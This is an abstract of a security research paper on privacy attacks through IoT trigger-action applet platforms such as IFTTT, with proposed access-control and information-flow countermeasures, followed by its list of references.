If This Then What?: Controlling Flows in IoT Apps

IoT apps empower users by connecting a variety of otherwise unconnected services. These apps (or applets ) are triggered by external information sources to perform actions on external information sinks. We demonstrate that the popular IoT app platforms, including IFTTT (If This Then That), Zapier, and Microsoft Flow are susceptible to attacks by malicious applet makers, including stealthy privacy attacks to exfiltrate private photos, leak user location, and eavesdrop on user input to voice-controlled assistants. We study a dataset of 279,828 IFTTT applets from more than 400 services, classify the applets according to the sensitivity of their sources, and find that 30% of the applets may violate privacy. We propose two countermeasures for short- and longterm protection: access control and information flow control. For short-term protection, we suggest that access control classifies an applet as either exclusively private or exclusively public, thus breaking flows from private sources to sensitive sinks. For longterm protection, we develop a framework for information flow tracking in IoT apps. The framework models applet reactivity and timing behavior, while at the same time faithfully capturing the subtleties of attacker observations caused by applet output. We show how to implement the approach for an IFTTT-inspired setting leveraging state-of-the-art information flow tracking techniques for JavaScript based on the JSFlow tool and evaluate its effectiveness on a collection of applets.

[1]  Vitaly Shmatikov,et al.  Gone in Six Characters: Short URLs Considered Harmful for Cloud Services , 2016, ArXiv.

[2]  Saikat Guha,et al.  Bootstrapping Privacy Compliance in Big Data Systems , 2014, 2014 IEEE Symposium on Security and Privacy.

[3]  David Sands,et al.  A Per Model of Secure Information Flow in Sequential Programs , 1999, ESOP.

[4]  Jiyun Lee,et al.  Trigger-Action Programming in the Wild: An Analysis of 200,000 IFTTT Recipes , 2016, CHI.

[5]  Dominique Devriese,et al.  Reactive non-interference for the browser: extended version , 2011 .

[6]  Rui Wang,et al.  Unauthorized origin crossing on mobile platforms: threats and mitigation , 2013, CCS.

[7]  Ying Zhang,et al.  An empirical characterization of IFTTT: ecosystem, usage, and performance , 2017, Internet Measurement Conference.

[8]  Arnar Birgisson,et al.  JSFlow: tracking information flow in JavaScript and its APIs , 2014, SAC.

[9]  Jörg Schwenk,et al.  Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels , 2018, USENIX Security Symposium.

[10]  Patrick D. McDaniel,et al.  Sensitive Information Tracking in Commodity IoT , 2018, USENIX Security Symposium.

[11]  Atul Prakash,et al.  Decentralized Action Integrity for Trigger-Action IoT Platforms , 2018, NDSS.

[12]  Andrei Sabelfeld,et al.  Information-flow security for JavaScript and its APIs , 2016, J. Comput. Secur..

[13]  Roberto Giacobazzi,et al.  Abstract non-interference: parameterizing non-interference by abstract interpretation , 2004, POPL.

[14]  Atul Prakash,et al.  FlowFence: Practical Data Protection for Emerging IoT Application Frameworks , 2016, USENIX Security Symposium.

[15]  Toby C. Murray,et al.  Compositional Verification and Refinement of Concurrent Value-Dependent Noninterference , 2016, 2016 IEEE 29th Computer Security Foundations Symposium (CSF).

[16]  Christopher Krügel,et al.  Cross Site Scripting Prevention with Dynamic Data Tainting and Static Analysis , 2007, NDSS.

[17]  Daniel Grahl,et al.  Non-interference with What-Declassification in Component-Based Systems , 2016, 2016 IEEE 29th Computer Security Foundations Symposium (CSF).

[18]  Klara Nahrstedt,et al.  Identity, location, disease and more: inferring your secrets from android public resources , 2013, CCS.

[19]  Michael D. Ernst,et al.  Automatic Trigger Generation for Rule-based Smart Homes , 2016, PLAS@CCS.

[20]  Maya Cakmak,et al.  Supporting mental model accuracy in trigger-action programming , 2015, UbiComp.

[21]  Blase Ur,et al.  Rethinking Access Control and Authentication for the Home Internet of Things (IoT) , 2018, USENIX Security Symposium.

[22]  J. Meseguer,et al.  Security Policies and Security Models , 1982, 1982 IEEE Symposium on Security and Privacy.

[23]  Lujo Bauer,et al.  Some Recipes Can Do More Than Spoil Your Appetite: Analyzing the Security and Privacy Risks of IFTTT Recipes , 2017, WWW.

[24]  Blase Ur,et al.  Practical trigger-action programming in the smart home , 2014, CHI.

[25]  Daniel Jackson,et al.  Multi-representational security analysis , 2016, SIGSOFT FSE.

[26]  Peter J. Denning,et al.  Certification of programs for secure information flow , 1977, CACM.

[27]  Timothy Sohn,et al.  iCAP: Interactive Prototyping of Context-Aware Applications , 2006, Pervasive.

[28]  Mark W. Newman,et al.  Providing an Integrated User Experience of Networked Media, Devices, and Services through End-User Composition , 2009, Pervasive.

[29]  Benjamin C. Pierce,et al.  Reactive noninterference , 2009, CCS.

[30]  Niels Provos,et al.  Trends and Lessons from Three Years Fighting Malicious Extensions , 2015, USENIX Security Symposium.